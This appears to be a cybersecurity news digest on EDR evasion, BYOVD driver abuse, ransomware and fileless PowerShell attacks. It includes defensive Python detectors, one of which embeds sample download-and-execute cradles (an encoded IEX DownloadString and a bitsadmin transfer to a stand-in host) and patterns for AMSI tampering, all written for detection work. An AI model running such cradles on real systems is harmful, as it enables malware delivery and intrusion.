EDR

Winsage
April 8, 2025
April 2025 Patch Tuesday introduced fixes for over 120 vulnerabilities, including an actively exploited zero-day, CVE-2025-29824. CVE-2025-29824 is a use-after-free vulnerability in the Windows Common Log File System (CLFS) driver that lets an attacker who already has code execution on a machine escalate privileges to SYSTEM. Microsoft has patched 32 CLFS vulnerabilities since 2022, six of which were exploited in the wild. Other notable vulnerabilities include CVE-2025-26663 and CVE-2025-26670, both unauthenticated use-after-free vulnerabilities in Windows LDAP, and CVE-2025-27480 and CVE-2025-27482 in Windows Remote Desktop Services. At the time of writing, none of these had been patched for Windows 10 systems, though updates are forthcoming. Microsoft also reversed its decision to discontinue driver update synchronization to WSUS servers, confirming that WSUS will continue to synchronize driver updates.
Tech Optimizer
April 7, 2025
Sakura RAT is a newly released remote administration tool published on GitHub and marketed to malware analysts and security researchers. It advertises hidden browsing, hidden virtual network computing (HVNC), fileless execution, multi-session control, and anti-detection mechanisms intended to evade antivirus and endpoint detection systems. While marketed for research purposes, its open availability raises concerns about misuse by cybercriminals for data exfiltration and ransomware deployment. Security experts are advocating for removal of the repository from GitHub and calling for improved detection of such tooling.
Tech Optimizer
March 31, 2025
The global cost of cybercrime is projected to reach $10.5 trillion annually by 2025. Many organizations continue to rely on traditional Endpoint Detection and Response (EDR) solutions, which are increasingly ineffective against sophisticated threats. EDR emerged in 2013 but has struggled to keep pace with evolving attack techniques: it is reactive, responding to incidents after they occur, and depends on known Indicators of Compromise (IoCs), which limits what it can catch. Real-world examples cited as traditional EDR failures include a faulty update to CrowdStrike's Falcon sensor that caused a global IT outage, the Akira ransomware group bypassing EDR through an unsecured webcam, the Medibank breach despite multiple EDR alerts, and the BlackCat ransomware attack on Henry Schein. The article presents these incidents as evidence that traditional EDR cannot prevent modern threats and argues that the next phase of endpoint security is Preemptive Endpoint Protection (PEP), which aims to prevent attacks rather than only detect and respond to them. PEP relies on proactive strategies such as Automated Moving Target Defense (AMTD) and Adaptive Exposure Management (AEM); the research it cites claims organizations using proactive security incur about 30% lower breach costs than those relying solely on reactive measures.
Tech Optimizer
March 31, 2025
Antivirus and endpoint security tools are increasingly challenged by ransomware groups that disable defenses early in an attack. Cisco Talos reported that attackers used "EDR killers" against endpoint detection and response (EDR) systems in nearly half of the ransomware incidents it handled in 2024, and that these tools succeeded in neutralizing the EDR about 48 percent of the time they were used. Tools such as EDRSilencer, EDRSandblast, EDRKillShifter, and Terminator pose significant threats. EDRKillShifter loads a vulnerable signed driver on the Windows host and uses it to terminate EDR processes from the kernel, a bring-your-own-vulnerable-driver (BYOVD) tactic also observed in operations by rival gangs such as Medusa, BianLian, and Play. The goal is to blind the EDR so attackers can operate undetected, which also complicates recovery: with telemetry gone, recovery often means wiping and rebuilding entire networks, and that is only feasible where robust backups the attackers could not reach still exist. Some EDR killers, such as HRSword, are legitimate software tools misused by ransomware actors. Attackers have also exploited misconfigured deployments, particularly EDR products left in audit-only mode, which log malicious activity but do not block it; verifying that prevention mode is actually enabled on every sensor is a cheap check. LockBit remained the most active ransomware-as-a-service group for the third consecutive year, accounting for 16 percent of claimed attacks in 2024, and newcomer RansomHub took second place with 11 percent of leak-site posts. Law enforcement actions play a significant role in shaping the ransomware landscape.
Tech Optimizer
March 23, 2025
In 2025, the Endpoint Detection and Response (EDR) market features several notable products, including:
1. Trend Micro: Offers advanced endpoint protection and threat detection with XDR features for real-time monitoring.
2. SentinelOne: Provides autonomous endpoint protection with AI-driven threat detection and customizable EDR solutions.
3. Cynet: Features an all-in-one cybersecurity platform with extensive threat coverage and ease of deployment.
4. Check Point: Delivers enterprise-class endpoint protection with advanced threat prevention and full disk encryption.
5. CrowdStrike: Focuses on real-time threat detection and machine learning-based malware identification.
6. Palo Alto Networks: Enhances threat detection and response capabilities with advanced analytics and machine learning.
7. BlackBerry Cylance: Utilizes AI and machine learning for threat detection and remediation, focusing on behavior analysis.
8. VMware Carbon Black: Offers a cloud-based solution leveraging machine learning for comprehensive threat detection and incident response.
9. Broadcom Symantec: Provides rapid threat detection and remediation with multi-layered malware protection and global threat intelligence.
10. Cisco: Known for comprehensive protection and real-time threat monitoring, preventing malware and identifying sophisticated threats.
Tech Optimizer
March 21, 2025
A report by Nima Bagheri reveals that a driver from Check Point's ZoneAlarm antivirus is being abused by threat actors in Bring Your Own Vulnerable Driver (BYOVD) attacks. The attack targets vulnerabilities in vsdatant.sys, a driver that runs with kernel privileges, letting attackers bypass Windows security measures. Specifically, version 14.1.32.0 of vsdatant.sys, released in 2016, contains flaws that allow attackers to circumvent Windows Memory Integrity (HVCI), read sensitive information, and establish persistent access to compromised systems. Bagheri advises users to update to the latest version of vsdatant.sys, which is not vulnerable. Check Point confirmed that the outdated driver is no longer shipped and that users running current versions of ZoneAlarm or Harmony Endpoint are not affected. Note that in a BYOVD attack the attacker brings the old signed driver along, so an up-to-date ZoneAlarm install does not by itself prevent that driver from being loaded on a machine; blocking the vulnerable version (for example through Microsoft's vulnerable driver blocklist or a WDAC policy) is what stops the abuse.
Winsage
March 7, 2025
The Akira ransomware group has shown it can bypass Endpoint Detection and Response (EDR) tools by pivoting through an unsecured webcam. In 2024, Akira accounted for 15% of the ransomware incidents handled by the S-RM team. The group typically gains initial access through exposed remote access solutions and relies on tools such as AnyDesk.exe. In the incident described, their first attempt to deploy ransomware on a Windows server was blocked by EDR. They then scanned the internal network and found a vulnerable webcam, a Linux-based device that no EDR agent covered. From the compromised webcam, Akira ran a Linux ransomware binary that encrypted files on the victim's network shares over SMB, so the encryption traffic originated from a device the EDR could not see. The incident highlights the need to patch and inventory IoT devices, audit networks for such blind spots, segment IoT from servers and workstations, and monitor IoT traffic for anomalies such as a camera opening SMB sessions.
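To make the last recommendation concrete, here is an added example (not code from the S-RM report or the article above) of a flow-log check that flags IoT devices opening SMB, RDP, WinRM or SSH sessions to internal hosts, and raises priority when one device touches several hosts or pushes a lot of data, which is what a webcam encrypting shares looks like from the network. The subnet ranges, the allowed-peer list, the thresholds and the flow records are all constructed for illustration.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional, Set, Tuple

# Assumed network layout (not from the report): cameras sit in 10.30.0.0/24 and
# should only talk to their gateway and the NVR, never to file servers.
IOT_SUBNETS = [ip_network("10.30.0.0/24")]
INTERNAL = ip_network("10.0.0.0/8")
ALLOWED_IOT_PEERS = {ip_address("10.30.0.1"), ip_address("10.1.0.50")}  # gateway, NVR
# Ports an IoT device has no business initiating connections to.
LATERAL_PORTS = {445: "SMB", 139: "NetBIOS", 3389: "RDP", 5985: "WinRM", 22: "SSH"}


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    bytes_out: int  # bytes sent by src in this flow


def is_iot(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in IOT_SUBNETS)


def classify(flow: Flow) -> Optional[str]:
    """Label a flow that an IoT device should never originate, else None."""
    if not is_iot(flow.src):
        return None
    dst = ip_address(flow.dst)
    if dst in ALLOWED_IOT_PEERS:
        return None
    if dst in INTERNAL and flow.dport in LATERAL_PORTS:
        return "iot_to_internal_" + LATERAL_PORTS[flow.dport].lower()
    return None


def find_anomalies(flows: List[Flow]) -> Dict[str, List[Tuple[str, str, int]]]:
    """Group suspicious flows by IoT source address."""
    findings: Dict[str, List[Tuple[str, str, int]]] = {}
    for f in flows:
        label = classify(f)
        if label:
            findings.setdefault(f.src, []).append((f.dst, label, f.bytes_out))
    return findings


def high_priority(findings, min_targets: int = 2, min_bytes: int = 1_000_000) -> Set[str]:
    """An IoT source that reaches several internal hosts on lateral ports, or
    pushes a lot of data over them, matches the scan-then-encrypt pattern."""
    hits = set()
    for src, items in findings.items():
        targets = {dst for dst, _, _ in items}
        sent = sum(b for _, _, b in items)
        if len(targets) >= min_targets or sent >= min_bytes:
            hits.add(src)
    return hits


# Constructed flow records for illustration; the thresholds above are assumptions.
SAMPLE_FLOWS = [
    Flow("10.30.0.15", "10.1.0.50", 554, 12_000_000),  # camera streaming RTSP to the NVR: normal
    Flow("10.30.0.21", "10.0.1.5", 445, 2_500_000),    # camera writing to a file server over SMB
    Flow("10.30.0.21", "10.0.1.6", 445, 3_100_000),
    Flow("10.30.0.21", "10.0.1.7", 445, 900_000),
    Flow("10.0.1.9", "10.0.1.5", 445, 50_000),         # workstation SMB: not IoT, out of scope here
    Flow("10.30.0.22", "10.0.2.40", 22, 3_000),        # one SSH attempt from a camera: flagged, lower priority
]

if __name__ == "__main__":
    found = find_anomalies(SAMPLE_FLOWS)
    urgent = high_priority(found)
    for src, items in found.items():
        tag = "HIGH" if src in urgent else "low"
        print(f"[{tag}] {src}: {len(items)} flow(s) -> {sorted({d for d, _, _ in items})}")
```

The check deliberately ignores the workstation-to-server SMB flow: the point is not that SMB is suspicious but that a camera has no reason to speak it, so segmentation policy and detection policy can share the same allow-list.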
Tech Optimizer
March 3, 2025
Security researchers are reporting an increase in fileless attacks, in which criminals use PowerShell and legitimate Microsoft binaries to run malware while leaving minimal traces on disk. Such techniques have existed for roughly twenty years and remain effective at evading traditional, file-scanning antivirus. Attackers use PowerShell to download and execute payloads directly in memory, complicating detection, and abuse living-off-the-land binaries and scripts (LOLBAS) such as BITS (bitsadmin) to fetch and launch malware. Memory injection techniques such as process hollowing let malware run inside what appears to be a legitimate process. To counter these threats, practitioners recommend deploying Endpoint Detection and Response, strengthening memory analysis, enabling comprehensive PowerShell logging (module, script block and transcription logging), and enforcing PowerShell Constrained Language Mode. Organizations should also monitor Active Directory and conduct regular vulnerability assessments. File-based controls alone are inadequate against these threats, so detection must shift to behavior-based monitoring.
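As an added example, not code from the article or from any vendor product, the following Python triage routine runs the detection ideas above over constructed PowerShell script-block log text (the ScriptBlockText field of event 4104 that script block logging produces): it decodes -EncodedCommand payloads, which are base64 of UTF-16LE text, and then looks for download cradles, in-memory execution, reflective assembly loading, bitsadmin abuse and AMSI tampering in both the outer and the decoded text. The pattern set and the sample events are assumed starting points, not a complete rule set.

```python
import base64
import re
from typing import Dict, List, Set, Tuple

# Regexes for the techniques described above; an assumed starting set, not a vendor rule set.
PATTERNS = [
    ("download_cradle", re.compile(
        r"Net\.WebClient|Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer", re.I)),
    ("in_memory_exec", re.compile(r"Invoke-Expression|\biex\b", re.I)),
    ("reflective_load", re.compile(r"Reflection\.Assembly\]::Load|Invoke-ReflectivePEInjection", re.I)),
    ("lolbas_bits", re.compile(r"bitsadmin(\.exe)?\s+/transfer", re.I)),
    ("amsi_tamper", re.compile(r"amsiInitFailed|AmsiScanBuffer", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
]
# -EncodedCommand and its short forms, followed by a base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text: str) -> List[str]:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text; return every decodable payload."""
    payloads = []
    for m in ENC_RE.finditer(text):
        try:
            payloads.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not really base64 (e.g. a long hex string after -e): ignore
    return payloads


def analyze_script_block(text: str, max_depth: int = 4) -> Set[str]:
    """Return technique names found in one script block, following nested encodings."""
    hits: Set[str] = set()
    queue: List[Tuple[str, int]] = [(text, 0)]
    while queue:
        t, depth = queue.pop()
        for name, rx in PATTERNS:
            if rx.search(t):
                hits.add(name)
        if depth < max_depth:  # bound the work in case of deeply nested encodings
            for inner in decode_encoded_commands(t):
                hits.add("encoded_command")
                queue.append((inner, depth + 1))
    return hits


def triage(events: Dict[str, str]) -> Dict[str, Set[str]]:
    """Map event id -> techniques for every block that triggered at least one pattern."""
    result = {}
    for eid, text in events.items():
        hits = analyze_script_block(text)
        if hits:
            result[eid] = hits
    return result


# Constructed script-block texts for illustration. evt-2 is built by encoding a
# download cradle the way powershell.exe -EncodedCommand expects it.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/p.ps1')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = {
    "evt-1": "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }",
    "evt-2": f"powershell.exe -nop -w hidden -enc {_ENCODED}",
    "evt-3": "$b=[IO.File]::ReadAllBytes('C:\\temp\\x.dll'); "
             "[Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)",
    "evt-4": "bitsadmin /transfer job /download /priority high http://10.0.0.5/a.exe C:\\ProgramData\\a.exe",
}

if __name__ == "__main__":
    for eid, hits in triage(SAMPLE_EVENTS).items():
        print(f"{eid}: {', '.join(sorted(hits))}")
```

Decoding the encoded command is the step that matters: without it, evt-2 would only show a hidden window and an opaque blob, and the cradle inside would never be matched. Script block logging already records the decoded text of a script when it runs, so in practice both the launcher command line and the 4104 event should be fed through the same patterns.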
Tech Optimizer
February 27, 2025
Researchers at Trellix have identified a malware campaign that abuses a legitimate, signed antivirus driver, the Avast Anti-Rootkit driver (aswArPot.sys), to gain kernel-level access and disable security tooling. The malware, named "kill-floor.exe", drops the Avast driver as a file called "ntfs.bin" and registers it as a kernel service with the Service Control utility (sc.exe), which loads the driver into the kernel. It then enumerates running processes and terminates those belonging to security products by sending IOCTL requests to the driver through the DeviceIoControl API, turning the driver's own kernel-mode process-termination capability against the system's defenses. Because the driver carries a valid signature, signature checks alone do not stop this; organizations are advised to adopt BYOVD protections such as Microsoft's vulnerable driver blocklist (enforced through HVCI or WDAC) and detection rules for vulnerable or misplaced drivers. Key indicators for this campaign are the MD5 hashes 40439f39f0195c9c7a3b519554afd17a (kill-floor.exe) and a179c4093d05a3e1ee73f6ff07f994aa (ntfs.bin).
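The following Python example is added here and is not Trellix's or Check Point's code. It shows one way to turn this report and the ZoneAlarm vsdatant.sys report above into a single detection rule over service-install events: it matches the two MD5 IOCs quoted above, flags kernel drivers registered from outside System32\drivers or without a .sys extension, flags drivers whose PE original filename differs from the on-disk name (aswArPot.sys dropped as ntfs.bin), and flags vsdatant.sys at version 14.1.32.0 or older. The event fields (modelled on System event 7045 plus file metadata an EDR agent would attach), the sc.exe heuristic, the sample events and the newer vsdatant.sys version number are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# IOC hashes quoted in the Trellix write-up summarised above.
KNOWN_BAD_MD5 = {
    "40439f39f0195c9c7a3b519554afd17a": "kill-floor.exe",
    "a179c4093d05a3e1ee73f6ff07f994aa": "ntfs.bin (renamed aswArPot.sys)",
}
# Signed drivers known to be abused for process killing. The vsdatant.sys cut-off is
# the version named in the ZoneAlarm report; treating every aswArPot.sys load as
# reviewable is an assumption for this example.
ABUSABLE_DRIVERS = {
    "aswarpot.sys": None,            # any version: review
    "vsdatant.sys": (14, 1, 32, 0),  # this version and older
}
DRIVER_DIR = "c:\\windows\\system32\\drivers\\"


@dataclass
class ServiceInstall:
    """Fields modelled on System event 7045 plus file metadata an agent would attach (assumed)."""
    service_name: str
    image_path: str
    service_type: str                        # "kernel mode driver" or "user mode service"
    installer: str                           # process that called the SCM, e.g. sc.exe
    original_filename: Optional[str] = None  # OriginalFilename from the PE version resource
    file_version: Optional[str] = None
    md5: Optional[str] = None


def parse_version(s: str) -> Tuple[int, ...]:
    return tuple(int(p) for p in re.findall(r"\d+", s))


def normalize_path(p: str) -> str:
    """Lower-case and resolve the usual SystemRoot spellings so prefix checks are reliable."""
    p = p.strip().strip('"').lower()
    return re.sub(r"^(\\\?\?\\|\\systemroot|%systemroot%)", r"c:\\windows", p)


def assess(evt: ServiceInstall) -> List[str]:
    """Return the reasons this service install looks like BYOVD; empty means nothing seen."""
    reasons = []
    path = normalize_path(evt.image_path)
    basename = path.rsplit("\\", 1)[-1]
    is_driver = "driver" in evt.service_type.lower()

    if evt.md5 and evt.md5.lower() in KNOWN_BAD_MD5:
        reasons.append("ioc_hash_match:" + KNOWN_BAD_MD5[evt.md5.lower()])
    if is_driver and not path.startswith(DRIVER_DIR):
        reasons.append("driver_outside_system32")
    if is_driver and not basename.endswith(".sys"):
        reasons.append("driver_without_sys_extension")
    orig = (evt.original_filename or "").lower()
    if orig and orig != basename:
        reasons.append(f"renamed_driver:{orig}->{basename}")
    if orig in ABUSABLE_DRIVERS:
        cutoff = ABUSABLE_DRIVERS[orig]
        if cutoff is None or (evt.file_version and parse_version(evt.file_version) <= cutoff):
            reasons.append("abusable_driver:" + orig)
    if is_driver and evt.installer.lower().endswith("sc.exe"):
        reasons.append("driver_installed_via_sc")  # weak signal on its own; assumed heuristic
    return reasons


def severity(reasons: List[str]) -> str:
    if any(r.startswith(("ioc_hash_match", "abusable_driver")) for r in reasons):
        return "high"
    return "medium" if reasons else "none"


# Constructed sample events. Versions other than 14.1.32.0 are assumed.
SAMPLE_EVENTS = [
    ServiceInstall("iaStorV", "\\SystemRoot\\System32\\drivers\\iaStorV.sys", "kernel mode driver",
                   "C:\\Windows\\System32\\msiexec.exe", "iaStorV.sys", "8.9.1.1001"),
    ServiceInstall("ntfs", "C:\\Users\\Public\\ntfs.bin", "kernel mode driver",
                   "C:\\Windows\\System32\\sc.exe", "aswArPot.sys", None,
                   "a179c4093d05a3e1ee73f6ff07f994aa"),
    ServiceInstall("vsdatant", "C:\\Windows\\System32\\drivers\\vsdatant.sys", "kernel mode driver",
                   "C:\\Temp\\setup.exe", "vsdatant.sys", "14.1.32.0"),
    ServiceInstall("vsdatant", "C:\\Windows\\System32\\drivers\\vsdatant.sys", "kernel mode driver",
                   "C:\\Program Files\\CheckPoint\\setup.exe", "vsdatant.sys", "15.8.211.0"),
]

if __name__ == "__main__":
    for evt in SAMPLE_EVENTS:
        reasons = assess(evt)
        print(f"{evt.service_name:10} {severity(reasons):6} {reasons}")
```

The hash match is the least durable signal, since the next campaign will drop the same driver under a different name with a different wrapper; the path, extension and OriginalFilename mismatches survive that, and the version cut-off is what catches a correctly named vsdatant.sys that an attacker brought along.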